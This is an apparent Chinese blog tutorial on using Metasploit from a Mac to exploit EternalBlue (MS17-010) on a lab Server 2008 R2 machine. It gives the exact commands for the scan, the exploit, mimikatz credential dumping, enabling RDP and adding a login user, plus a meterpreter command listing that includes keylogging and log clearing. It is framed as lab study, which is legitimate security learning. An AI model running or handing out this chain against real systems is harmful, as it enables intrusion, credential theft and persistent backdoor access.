永恒之蓝实战教程之Mac通过Metasploit攻击Server2008的详细过程

08-31 134阅读 0评论

导读

准备一个Server2008,通过Metasploit获取system访问权限,进入meterpreter交互界面。通过Shell命令,连通目标机器的cmd,查看目标系统信息。然后通过mimikatz查看系统用户。最后通过run enable_rdp开启控制机远程桌面创建用户。

开发环境

版本号描述Macos攻击机器)11.5Windows(目标机器)Server 2008 R2 x64 SP1Metasploit6.2.15-dev-1b985447c5dccba9be98ed7cef60eecf487b9ec5Microsoft_Remote_Desktop10.7.9

基础知识

永恒之蓝

SMB(Server Message Block)又称网络文件共享系统(Common Internet File System,缩写为CifS),一种应用层网络传输协议,主要功能是使网络上的机器能够共享计算机文件、打印机、串行端口和通讯等资源。它也提供经认证的行程间通信机能。

永恒之蓝”(Eternalblue)漏洞编号MS17-010 泄露美国国家安全局(NSA)黑客工具

该漏洞利用工具针对TCP 445端口(Server Message Block/SMB)的文件分享协议进行攻击,可以获取系统最高权限system

漏洞影响:Windows NT,Windows 2000、Windows XP、Windows 2003、Windows Vista、Windows 7、Windows 8,Windows 2008、Windows 2008 R2、Windows Server 2012 SP0等

Metasploit

常用命令

show exploiTS – 查看所有可用的渗透攻击程序代码  show auxiliary – 查看所有可用的辅助攻击工具  show optiONs – 查看该模块所有可用选项  show payloads – 查看该模块适用的所有载荷代码  show tarGets – 查看该模块适用的攻击目标类型 search – 根据关键字搜索某模块  info – 显示某模块的详细信息  use – 进入使用某渗透攻击模块  back – 回退  set/unset – 设置/禁用模块中的某个参数  setg/unsetg – 设置/禁用适用于所有模块的全局参数  save – 将当前设置值保存下来,以便下次启动MSF终端时仍可使用

meterpreter

meterpreter 是一个高级的,动态的,可拓展的Payload,出现meterpreter 我们就有了shell,可以执行非常多的命令,去操控远端设备。执行命令:?或者help,显示出可以执行的全部命令。我们会用到uploadrun等命令。

Core Commands ============= Command   Description -------   ----------- ? Help menu backgroundBackgrounds the current session bgAlias for background bgkillKills a background meterpreter script bglistLists running background scripts bgrun Executes a meterpreter script as a background thread channel   Displays information or control active channels Close Closes a channel detachDetach the meterpreter session (for http/https) disable_unicode_encoding  Disables encoding of unicode strings enable_unicode_encoding   Enables encoding of unicode strings exit  Terminate the meterpreter session get_timeouts  Get the current session timeout values GUId  Get the session GUID help  Help menu info  Displays information about a Post module irb   Open an interactive Ruby shell on the current session load  Load one or more meterpreter extensions machine_idGet the MSF ID of the machine attached to the session migrate   Migrate the server to another process pivot Manage pivot listeners pry   Open the Pry debugger on the current session quit  Terminate the meterpreter session read  Reads data from a channel resource  Run the commands stored in a file run   Executes a meterpreter script or Post module secure(Re)NeGotiate TLV packet encryption on the session sessions  Quickly Switch to another session set_timeouts  Set the current session timeout values sleep force Meterpreter to GO quiet, then re-establish session ssl_verifyModify the SSL certificate verification setting transport Manage the transport mechanisms use   Deprecated alias for "load" uuid  Get the UUID for the current session write Writes data to a channel StdAPI: File system Commands ============================ Command   Description -------   ----------- cat   Read the contents of a file to the screen cdChange directory checksum  Retrieve the checksum of a file cpCopy source to destination del   Delete the specified file dir   List files (alias for ls) download  Download a file or directory edit  Edit a file getlwdPrint local working directory getwd Print working directory lcat  Read the contents of a local file to the screen lcd   Change local working directory lls   List local files lpwd  Print local working directory lsList files mkdir Make directory mvMove source to destination pwd   Print working directory rmDelete the specified file rmdir Remove directory searchSearch for files show_mountList all mount points/logical drives uploadUpload a file or directory Stdapi: Networking Commands =========================== Command   Description -------   ----------- arp   Display the host ARP cache getProxy  Display the current proxy configuration ifconfig  Display interfaces ipconfig  Display interfaces netstat   Display the network connections portfwd   Forward a local port to a remote service resolve   Resolve a set of host names on the target route View and modify the routing table Stdapi: System Commands ======================= Command   Description -------   ----------- clearev   Clear the event log drop_tokenRelinquishes any active impersonation token. execute   Execute a command getenvGet one or more environment variable values getPIDGet the current process identifier getpriVS  Attempt to enable all privileges available to the current process getsidGet the SID of the user that the server is running as getuidGet the user that the server is running as kill  Terminate a process localtime Displays the target system local date and time pgrep Filter processes by name pkill Terminate processes by name psList running processes rebootReboots the remote computer reg   Modify and interact with the remote registry rev2self  Calls RevertToSelf() on the remote machine shell Drop into a system command shell shutdown  Shuts down the remote computer steal_token   Attempts to steal an impersonation token from the target process suspend   Suspends or resumes a list of processes sysinfo   Gets information about the remote system, such as OS Stdapi: User interface Commands =============================== CommandDescription ------------------ enUMDesktops   List all accessible desktops and window stations getdesktop Get the current meterpreter desktop idletime   Returns the number of seconds the remote user has been idle keyboard_send  Send keystrokes keyevent   Send key events keyscan_dump   Dump the keystroke buffer keyscan_start  Start capturing keystrokes keyscan_stop   Stop capturing keystrokes mouse  Send mouse events screenshareWatch the remote user desktop in real time screenshot Grab a screenshot of the interactive desktop setdesktop Change the meterpreters current desktop uictl  Control some of the user interface components Stdapi: Webcam Commands ======================= CommandDescription ------------------ record_mic Record audio from the default microphone for X seconds webcam_chatStart a video chat webcam_listList webcams webcam_snapTake a snapshot from the specified webcam webcam_stream  Play a video stream from the specified webcam Stdapi: Audio Output Commands ============================= Command   Description -------   ----------- play  play a waveform audio file (.wav) on the target system Priv: Elevate Commands ====================== Command   Description -------   ----------- getsystem Attempt to elevate your privilege to that of local system. Priv: PassWord database Commands ================================ Command   Description -------   ----------- hashdump  Dumps the contents of the SAM database Priv: Timestomp Commands ======================== Command   Description -------   ----------- timestomp Manipulate file MACE attributes 

准备工作

虚拟机安装Server2008

系统下载地址:https://msdn.itellyou.cn/

安装:略~~~

Mac上安装Metasploit

下载安装:【可忽略】官网地址:https://www.metasploit.com/download【可忽略】通过官网,只能访问到github的wiki页面,wiki页面又让跳转到官网的帮助文档页面:https://docs.metasploit.com/docs/using-metasploit/getting-started/nightly-installers.html帮助页面中,我们可以看到支持各种平台,其中Mac平台是通过 https://osx.metasploit.com/metasploitframework-latest.pkg下载,直接安装即可。

初始化、运行:

# 切换到工作目录 cd /opt/metasploit-framework/bin/  # 一定要这么做,否则连接数据库一定有问题。 ./msfdb init  # 运行Metasploit开控台(运行一次会将路径设置到环境变量中,以后就可以直接访问该目录中所有命令了) ./msfconsole 

Mac上安装远程桌面客户端Microsoft Remote Desktop

通过App Store是无法搜索到Microsoft Remote Desktop的;通过https://apps.apple.com/tw/app/microsoft-remote-desktop/id1295203466页面跳转到App Store,会提示地区尚不提供此App

永恒之蓝实战教程之Mac通过Metasploit攻击Server2008的详细过程

这里,我们通过该地址直接下载https://mac.softpedia.com/get/Utilities/Microsoft-Remote-Desktop-Connection.shtml,下载的文件名Microsoft_Remote_Desktop_10.7.9_installer.pkg,双击即可安装。

永恒之蓝实战教程之Mac通过Metasploit攻击Server2008的详细过程

下面两个下载地址需要登录,有点麻烦

玩转苹果下载:https://www.ifunmac.com/?s=Microsoft+Remote+Desktop+for+Mac&x=0&y=0未来Mac下载: https://mac.orsoon.com/search/Microsoft%20Remote%20Desktop%20for%20Ma_mac_1.html

通过Metasploit,获取靶机shell 搜索17-010相关漏洞插件

msf6 > search 17-010

永恒之蓝实战教程之Mac通过Metasploit攻击Server2008的详细过程

使用scanner辅助验证插件扫描漏洞

# 选中插件 use auxiliary/scanner/smb/smb_ms17_010 # 设置目录机器,单个ip验证(虚拟机中的Server2008) set RHOSTS 192.168.1.216  # 开始执行漏洞扫描 run

效果如下:

永恒之蓝实战教程之Mac通过Metasploit攻击Server2008的详细过程

永恒之蓝实战教程之Mac通过Metasploit攻击Server2008的详细过程

ps:show options是显示这个插件相关的参数,在Required这一栏下面是yes的表示必填参数。

永恒之蓝实战教程之Mac通过Metasploit攻击Server2008的详细过程

ps:参数RHOSTSTHREADS:

# RHOSTS这个参数可以设置一个目标网段,进行扫描测试 set RHOSTS 192.168.29.1/24  # 设置扫描线程,插件默认是1,这里设置为20: set THREADS 20

exploit获取shell

使用exploit模块来进行攻击测试

use exploit/windows/smb/ms17_010_eternalblue  set RHOSTS 192.168.1.1 set THREADS 10 run

效果如下:

永恒之蓝实战教程之Mac通过Metasploit攻击Server2008的详细过程

永恒之蓝实战教程之Mac通过Metasploit攻击Server2008的详细过程

执行命令shell即可进入cmd命令行:

永恒之蓝实战教程之Mac通过Metasploit攻击Server2008的详细过程

ps:在windows命令行输入 chcp 65001 解决中文乱码

利用mimikatz模块,爆破靶机账号密码

# 加载mimikatz load mimikatz  # 读取内存中存放的账号密码 creds_wdigest 

效果如下:

永恒之蓝实战教程之Mac通过Metasploit攻击Server2008的详细过程

利用meterpreter模块,开启控制机远程桌面并创建用户

开启rdp

# 1,启动远程桌面(通过爆破出来的密码登录) meterpreter > run post/windows/manage/enable_rdp  # 2,创建一个新用户来远程连接 windows 桌面 meterpreter > run post/windows/manage/enable_rdp username=root password=root@toor.com

通过Microsoft Remote Desktop远程连接Server2008

永恒之蓝实战教程之Mac通过Metasploit攻击Server2008的详细过程

ps:kali连接windows桌面 rdesktop 192.168.1.216

参考资料

mac下安装Metasploit https://www.kali.org/get-kali/#kali-bare-metal

到此这篇关于永恒之蓝实战教程Mac通过Metasploit攻击Server2008的文章就介绍到这了,更多相关Metasploit攻击Server2008内容请搜索云初冀北以前的文章或继续浏览下面的相关文章希望大家以后多多支持云初冀北!

免责声明
本站提供的资源,都来自网络,版权争议与本站无关,所有内容及软件的文章仅限用于学习和研究目的。不得将上述内容用于商业或者非法用途,否则,一切后果请用户自负,我们不保证内容的长久可用性,通过使用本站内容随之而来的风险与本站无关,您必须在下载后的24个小时之内,从您的电脑/手机中彻底删除上述内容。如果您喜欢该程序,请支持正版软件,购买注册,得到更好的正版服务。侵删请致信E-mail:goliszhou@gmail.com
$

发表评论

表情:
评论列表 (暂无评论,134人围观)

还没有评论,来说两句吧...